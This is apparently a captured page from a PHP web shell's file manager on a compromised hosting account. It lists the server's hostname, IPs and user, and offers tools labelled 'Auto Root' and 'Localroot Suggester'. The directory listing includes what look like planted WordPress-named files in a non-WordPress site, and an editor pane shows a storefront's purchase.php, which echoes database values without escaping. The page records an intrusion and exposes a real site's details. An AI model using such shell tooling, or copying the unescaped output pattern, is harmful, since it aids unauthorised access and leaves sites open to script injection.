Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data sycho /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
auth
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
layouts
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
uploads
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
404.php
2.81
KB
-rw-r--r--
2026-03-01 20:29
PRD.md
10.42
KB
-rw-r--r--
2026-03-01 20:12
contact.php
8.52
KB
-rw-r--r--
2026-03-01 23:42
dashboard.php
27.37
KB
-rw-r--r--
2026-03-01 20:23
database.sql
3.35
KB
-rw-r--r--
2026-03-01 20:13
error_log
6.87
KB
-rw-r--r--
2026-03-01 20:23
index.php
11.9
KB
-rw-r--r--
2026-03-16 18:50
me.zip
14.2
MB
-rw-r--r--
2026-03-01 20:08
payment.php
9.09
KB
-rw-r--r--
2026-03-01 23:13
process_order.php
2.36
KB
-rw-r--r--
2026-03-01 21:23
purchase.php
6.51
KB
-rw-r--r--
2026-03-01 23:14
services.php
5.29
KB
-rw-r--r--
2026-03-01 23:40
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php include 'includes/db.php'; session_start(); // Force Login if (!isset($_SESSION['user_id'])) { header('Location: auth/login.php'); exit; } $service_id = $_GET['id'] ?? 1; // Fetch service details $stmt = $pdo->prepare("SELECT * FROM services WHERE id = ?"); $stmt->execute([$service_id]); $service = $stmt->fetch(); if (!$service) { // Fallback if not in DB $service = [ 'id' => $service_id, 'name' => 'Premium Custom Solution', 'price' => 'Custom', 'payment_instructions' => 'Please contact support at <strong>admin@gmail.com</strong> for payment details regarding this specific solution.' ]; } else { $service['payment_instructions'] = 'Please send the amount to <strong>payment@codebysycho.com</strong> via PayPal or your preferred payment method mentioned in the dashboard. After payment, attach your transaction ID below.'; } include 'layouts/header.php'; ?> <main style="padding-top: 100px; padding-bottom: 80px; background: #fafafa; min-height: 100vh;"> <div class="container"> <div style="max-width: 1000px; margin: 0 auto; padding: 0 1rem;"> <div style="margin-bottom: 3.5rem;"> <p style="font-size: 0.75rem; font-weight: 800; color: var(--primary); text-transform: uppercase; letter-spacing: 2px; margin-bottom: 0.5rem;">Finalization Floor</p> <h1 style="font-size: 2.2rem; font-weight: 800; margin-bottom: 0.8rem; letter-spacing: -1px; color: var(--text-main);">Project Verification</h1> <p style="color: var(--text-dim); font-size: 1rem; font-weight: 500;">Review your selection and define the operational blueprint.</p> </div> <div class="dashboard-grid" style="display: grid; grid-template-columns: 1fr 380px; gap: 3rem; align-items: start;"> <!-- Left: Order Form --> <div class="card admin-card" style="background: #ffffff; border: 1px solid rgba(0,0,0,0.05); box-shadow: 0 30px 60px rgba(0,0,0,0.02);"> <h3 style="margin-bottom: 2rem; font-weight: 800; font-size: 1.3rem; color: var(--text-main);">Operational Blueprint</h3> <form action="process_order.php" method="POST"> <input type="hidden" name="service_id" value="<?php echo $service['id']; ?>"> <div class="form-group" style="margin-bottom: 1.8rem;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.8rem; font-weight: 800; color: #475569; text-transform: uppercase; letter-spacing: 1px;">Project Codename</label> <input type="text" name="project_name" placeholder="E.g. Nexus Core Infrastructure" required style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; font-weight: 600;"> </div> <div class="form-group" style="margin-bottom: 1.8rem;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.8rem; font-weight: 800; color: #475569; text-transform: uppercase; letter-spacing: 1px;">Full Technical Brief</label> <textarea name="requirements" placeholder="Define the primary functions and endpoints..." rows="6" required style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; font-weight: 600; resize: none;"></textarea> </div> <div class="form-group" style="margin-bottom: 2.5rem;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.8rem; font-weight: 800; color: #475569; text-transform: uppercase; letter-spacing: 1px;">Desired Target Date</label> <input type="date" name="deadline" style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; font-weight: 600;"> </div> <button type="submit" class="btn-primary" style="width: 100%; padding: 1.2rem; border-radius: 15px; font-weight: 800; font-size: 1rem; box-shadow: 0 10px 20px var(--primary-glow);">Authorize & Initialize</button> </form> </div> <!-- Right: Summary & Payment --> <aside style="position: sticky; top: 120px;"> <div class="card admin-card" style="background: var(--primary-light); border: 2px solid var(--primary); margin-bottom: 2rem;"> <h4 style="color: var(--primary); margin-bottom: 1.2rem; font-weight: 800; text-transform: uppercase; font-size: 0.75rem; letter-spacing: 1.5px;">Financial Summary</h4> <div style="display: flex; justify-content: space-between; margin-bottom: 1.2rem; align-items: center;"> <span style="font-weight: 700; color: #166534; font-size: 0.85rem;">Solution:</span> <span style="font-weight: 800; color: #0f172a; font-size: 0.95rem;"><?php echo $service['name']; ?></span> </div> <div style="display: flex; justify-content: space-between; padding-top: 1.2rem; border-top: 1px solid rgba(34, 197, 94, 0.2); align-items: center;"> <span style="font-weight: 700; color: #166534; font-size: 0.85rem;">Commitment:</span> <span style="font-weight: 900; color: var(--primary); font-size: 1.6rem;">$<?php echo $service['price']; ?></span> </div> </div> <div class="card admin-card" style="background: #ffffff; border: 1px solid #f1f5f9;"> <h4 style="margin-bottom: 1.2rem; font-weight: 800; font-size: 1rem; color: var(--text-main);"><i class="fas fa-shield-alt" style="margin-right: 0.8rem; color: var(--primary);"></i> Security Protocol</h4> <p style="font-size: 0.85rem; color: #64748b; font-weight: 500; line-height: 1.6; margin-bottom: 0;"> <?php echo $service['payment_instructions']; ?> </p> </div> </aside> </div> </div> </div> </main> <?php include 'layouts/footer.php'; ?>